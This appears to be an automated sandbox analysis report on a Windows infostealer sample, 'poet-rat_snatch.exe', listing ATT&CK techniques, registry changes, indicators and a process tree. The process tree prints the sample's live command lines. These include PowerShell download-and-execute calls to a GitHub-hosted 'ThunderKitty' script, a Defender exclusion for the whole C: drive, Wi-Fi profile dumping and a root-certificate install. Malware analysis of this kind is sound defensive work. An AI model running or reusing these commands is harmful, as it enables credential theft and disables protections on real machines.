945996116316f77936ec828920c33e1ddbf838585bd221da5ddf966a017a50e2

Analysis

max time kernel
120s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20/08/2024, 22:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe
Size

14.0MB
MD5

bc3cf1ec8c10d72db3641d400ab8fedf
SHA1

9237d4edd32d40d68fbbf4e494fc9e041635ee27
SHA256

945996116316f77936ec828920c33e1ddbf838585bd221da5ddf966a017a50e2
SHA512

318209a4a9c833499bd18b5047dd719811806567ee8369410928274ca72245b4d6dd11c9eecbca85bac9f1984552a3ad245c89f85c4913268d68d4ffaeb434a7
SSDEEP

196608:5sWQx346uodNv5Q8dbWfiwmjmX3o9gvK9aXFFT:52xoobv5Q8CmjmHzvfz

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
20	4556	powershell.exe
21	2716	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3296	powershell.exe
4556	powershell.exe
2716	powershell.exe
2996	PowerShell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4628	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
19	raw.githubusercontent.com
20	raw.githubusercontent.com
21	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1772	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2408	netsh.exe
3976	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
2976	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4956	ipconfig.exe
2976	NETSTAT.EXE
2616	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2864	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3296	powershell.exe
4556	powershell.exe
2716	powershell.exe
3296	powershell.exe
4556	powershell.exe
2716	powershell.exe
2996	PowerShell.exe
2996	PowerShell.exe
2716	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2996	PowerShell.exe
Token: SeDebugPrivilege	2864	taskkill.exe
Token: 33	388	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	388	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	2716	powershell.exe
Token: SeSecurityPrivilege	2716	powershell.exe
Token: SeTakeOwnershipPrivilege	2716	powershell.exe
Token: SeLoadDriverPrivilege	2716	powershell.exe
Token: SeSystemProfilePrivilege	2716	powershell.exe
Token: SeSystemtimePrivilege	2716	powershell.exe
Token: SeProfSingleProcessPrivilege	2716	powershell.exe
Token: SeIncBasePriorityPrivilege	2716	powershell.exe
Token: SeCreatePagefilePrivilege	2716	powershell.exe
Token: SeBackupPrivilege	2716	powershell.exe
Token: SeRestorePrivilege	2716	powershell.exe
Token: SeShutdownPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeSystemEnvironmentPrivilege	2716	powershell.exe
Token: SeRemoteShutdownPrivilege	2716	powershell.exe
Token: SeUndockPrivilege	2716	powershell.exe
Token: SeManageVolumePrivilege	2716	powershell.exe
Token: 33	2716	powershell.exe
Token: 34	2716	powershell.exe
Token: 35	2716	powershell.exe
Token: 36	2716	powershell.exe
Token: SeIncreaseQuotaPrivilege	2716	powershell.exe
Token: SeSecurityPrivilege	2716	powershell.exe
Token: SeTakeOwnershipPrivilege	2716	powershell.exe
Token: SeLoadDriverPrivilege	2716	powershell.exe
Token: SeSystemProfilePrivilege	2716	powershell.exe
Token: SeSystemtimePrivilege	2716	powershell.exe
Token: SeProfSingleProcessPrivilege	2716	powershell.exe
Token: SeIncBasePriorityPrivilege	2716	powershell.exe
Token: SeCreatePagefilePrivilege	2716	powershell.exe
Token: SeBackupPrivilege	2716	powershell.exe
Token: SeRestorePrivilege	2716	powershell.exe
Token: SeShutdownPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeSystemEnvironmentPrivilege	2716	powershell.exe
Token: SeRemoteShutdownPrivilege	2716	powershell.exe
Token: SeUndockPrivilege	2716	powershell.exe
Token: SeManageVolumePrivilege	2716	powershell.exe
Token: 33	2716	powershell.exe
Token: 34	2716	powershell.exe
Token: 35	2716	powershell.exe
Token: 36	2716	powershell.exe
Token: SeIncreaseQuotaPrivilege	2716	powershell.exe
Token: SeSecurityPrivilege	2716	powershell.exe
Token: SeTakeOwnershipPrivilege	2716	powershell.exe
Token: SeLoadDriverPrivilege	2716	powershell.exe
Token: SeSystemProfilePrivilege	2716	powershell.exe
Token: SeSystemtimePrivilege	2716	powershell.exe
Token: SeProfSingleProcessPrivilege	2716	powershell.exe
Token: SeIncBasePriorityPrivilege	2716	powershell.exe
Token: SeCreatePagefilePrivilege	2716	powershell.exe
Token: SeBackupPrivilege	2716	powershell.exe
Token: SeRestorePrivilege	2716	powershell.exe
Token: SeShutdownPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeSystemEnvironmentPrivilege	2716	powershell.exe
Token: SeRemoteShutdownPrivilege	2716	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 2776 wrote to memory of 2716	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	87
PID 2776 wrote to memory of 2716	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	87
PID 2776 wrote to memory of 4556	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	88
PID 2776 wrote to memory of 4556	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	88
PID 2776 wrote to memory of 3296	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	90
PID 2776 wrote to memory of 3296	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	90
PID 2776 wrote to memory of 2372	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	91
PID 2776 wrote to memory of 2372	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	91
PID 2776 wrote to memory of 2996	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	92
PID 2776 wrote to memory of 2996	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	92
PID 2776 wrote to memory of 5068	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	94
PID 2776 wrote to memory of 5068	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	94
PID 2776 wrote to memory of 1132	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	93
PID 2776 wrote to memory of 1132	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	93
PID 2372 wrote to memory of 4892	2372	cmd.exe	95
PID 2372 wrote to memory of 4892	2372	cmd.exe	95
PID 2716 wrote to memory of 4640	2716	powershell.exe	96
PID 2716 wrote to memory of 4640	2716	powershell.exe	96
PID 2776 wrote to memory of 2864	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	97
PID 2776 wrote to memory of 2864	2776	2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe	97
PID 4640 wrote to memory of 2500	4640	csc.exe	98
PID 4640 wrote to memory of 2500	4640	csc.exe	98
PID 2716 wrote to memory of 2408	2716	powershell.exe	102
PID 2716 wrote to memory of 2408	2716	powershell.exe	102
PID 2716 wrote to memory of 2396	2716	powershell.exe	107
PID 2716 wrote to memory of 2396	2716	powershell.exe	107
PID 2396 wrote to memory of 1444	2396	net.exe	108
PID 2396 wrote to memory of 1444	2396	net.exe	108
PID 2716 wrote to memory of 4628	2716	powershell.exe	109
PID 2716 wrote to memory of 4628	2716	powershell.exe	109
PID 2716 wrote to memory of 4420	2716	powershell.exe	110
PID 2716 wrote to memory of 4420	2716	powershell.exe	110
PID 2716 wrote to memory of 1856	2716	powershell.exe	111
PID 2716 wrote to memory of 1856	2716	powershell.exe	111
PID 1856 wrote to memory of 3772	1856	net.exe	112
PID 1856 wrote to memory of 3772	1856	net.exe	112
PID 2716 wrote to memory of 4956	2716	powershell.exe	113
PID 2716 wrote to memory of 4956	2716	powershell.exe	113
PID 2716 wrote to memory of 1072	2716	powershell.exe	114
PID 2716 wrote to memory of 1072	2716	powershell.exe	114
PID 1072 wrote to memory of 2312	1072	net.exe	115
PID 1072 wrote to memory of 2312	1072	net.exe	115
PID 2716 wrote to memory of 1668	2716	powershell.exe	116
PID 2716 wrote to memory of 1668	2716	powershell.exe	116
PID 2716 wrote to memory of 2976	2716	powershell.exe	117
PID 2716 wrote to memory of 2976	2716	powershell.exe	117
PID 2716 wrote to memory of 2036	2716	powershell.exe	118
PID 2716 wrote to memory of 2036	2716	powershell.exe	118
PID 2716 wrote to memory of 2616	2716	powershell.exe	119
PID 2716 wrote to memory of 2616	2716	powershell.exe	119
PID 2716 wrote to memory of 3048	2716	powershell.exe	120
PID 2716 wrote to memory of 3048	2716	powershell.exe	120
PID 2716 wrote to memory of 1772	2716	powershell.exe	121
PID 2716 wrote to memory of 1772	2716	powershell.exe	121
PID 2716 wrote to memory of 3976	2716	powershell.exe	122
PID 2716 wrote to memory of 3976	2716	powershell.exe	122

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5068	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-20_bc3cf1ec8c10d72db3641d400ab8fedf_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cdxasvua\cdxasvua.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4640
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES928B.tmp" "c:\Users\Admin\AppData\Local\Temp\cdxasvua\CSC33CBC7B4F80C439AA1565C71DE77EABB.TMP"
      4⤵
      PID:2500
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2408
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:1444
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4628
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:4420
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3772
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4956
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:2312
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:1668
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:2976
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:2036
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:2616
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3048
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:1772
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3296
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2372
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:4892
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2996
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:1132
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:5068
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2864

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4 0x328
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa683ba35bef5db77615e4281ba4c0fc

SHA1
